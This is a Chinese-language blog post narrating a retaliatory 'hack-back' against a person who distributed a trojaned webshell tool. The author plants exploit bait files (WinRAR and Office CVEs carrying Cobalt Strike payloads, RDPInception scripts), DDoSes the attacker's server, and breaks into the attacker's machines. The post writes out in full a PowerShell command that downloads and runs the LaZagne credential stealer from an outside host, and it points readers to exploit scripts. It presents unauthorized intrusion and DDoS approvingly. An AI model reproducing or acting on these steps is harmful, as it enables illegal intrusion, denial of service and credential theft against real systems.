0×01 前言
写这篇文章时,这次的渗透已经完成一周多了,当时也没有想到会要写文章出来,所以有一部截图是后来补上的,为了我的人身安全,有涉及到的敏感信息,我都会打码,请多多包涵。
0×02 事情的起因
最近加了很多信息安全相关的QQ群,不得不说,在这些群里面受益匪浅,不过发现几个QQ群友,一直在推广他们的全自动渗透工具,会经常蹦出来什么全自动getshell工具箱、exp批量利用工具、电脑手机远程管理工具等等,还有很多我没听说过的工具,比如下面这些。


0×03 发现可疑文件
花了半天时间,下载了QQ群中大大小小好几款相关的工具分析了下,要么无法运行,各种报错,但并没有发现什么可疑的点。在准备放弃的时候,果不其然,发现一款Xise菜刀,解压需要输入密码,单就这一点我就觉得很可疑了。 二话不说,拨掉网线,打开虚拟机,启动火绒剑,运行该可疑程序,用火绒剑监控程序进程、文件访问、动作、网络连接等情况,马上就发现这个菜刀是被加过料的菜刀,菜刀自身会创建jpg文件到C盘,并且加注册表,创建服务项,还一直反向连接一个境外IP的1640端口,走TCP流量。



0×04 思路扩展
既然是老黑的远控,那他在我的电脑里面种了木马之后,很可能会翻我电脑的各种文件,于是就将计就计吧,那我精心制作一些比较有吸引力的文件吧,放置在我的电脑桌面,让老黑都去拿。 于是我在外网搭建了CobaltStrike远控,正式向老黑发起了战争。CobaltStrike的搭建请参考:http://suo.im/54mIL9。0×05 制作鱼饵
为了能提高老黑电脑的钓鱼上线成功率,最终我选择制作如下几种类型的文件,放置到我的电脑桌面,顺便把我制作的过程分享给兄弟们。1、制作winrar钓鱼压缩包文件
这个当时也没有截图,家里电脑的运行库正好出现问题,无法复现制作过程了。不过制作还是很简单的,同学们直接用这个脚本制作就行:https://github.com/WyAtu/CVE2018202502、构造RDPInception后门,留一台外网VPS
GitHub上也有自动化攻击一个脚本:https://github.com/mdsecactivebreach/RDPInception,但我本地一直没有实验成功,于是自己写了以下三个文件。powershell.vbs文件放置到我的外网VPS上的:"C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\powershell.vbs"
windows.bat文件放置到我的外网VPS上的:"C:\windows.bat"
WindowsMedia.bat文件放置到我的外网VPS上的:"C:\Program Files\WindowsMedia.bat"
powershell.vbs主要用于隐藏执行,不会出现黑窗口三个文件的内容如下,用过的人一看就懂了:

3、制作Office文档木马(CVE20178570)
使用了这个脚本:https://github.com/rxwx/CVE20178570 修改了calc文件中的代码为CobaltStrike远控上线代码

4、最终效果
所有的文件和压缩包里面都是有数据的,做的也不能太假了。下图是放在桌面上的的效果,这些文件都是加过料的后门(写文章时才发现,不知道为什么,用于钓鱼的电脑上应用程序图标不能正常显示了)。
0×06 DDOS攻击至宕机
准备就绪,就等老黑来上钩了。等了两天我的CobaltStrike没有反应,可能也是比较狡猾吧,并没有我想象的那么顺利,闲来无事,晚上找了一个压力测试平台,先把老黑的木马远控服务器打宕机吧。

0×07 内网电脑上钩
在4月3号,我用于钓鱼的外网VPS被异地登录,钓鱼很可能成功了。




0×08 使用LaZagne抓取电脑上各种连接密码
发现被控的电脑开机时间并不久,大概也能判断出来,此人下班有关电脑的习惯。

(echo powershell "($client = new‐object System.Net.WebClient) ‐and($client.DownloadFile('http://www.huihun.ml/laZagne.exe','wmplaye.exe')) ‐and (exit)") | cmd && wmplaye.exe all



0×09 成功登上木马远控服务器
使用抓取出来的账号与密码登录木马远控服务器。老黑原来使用的是DarkCometRAT远控, 上面被控的机器还真不少。

0×10 横向渗透、干内网、举报一波
到这里关于反向的钓鱼就先告一段落,明天要上班工作,今晚准备通宵干他的内网,再举报一波。0×11 此次的反向钓鱼流程
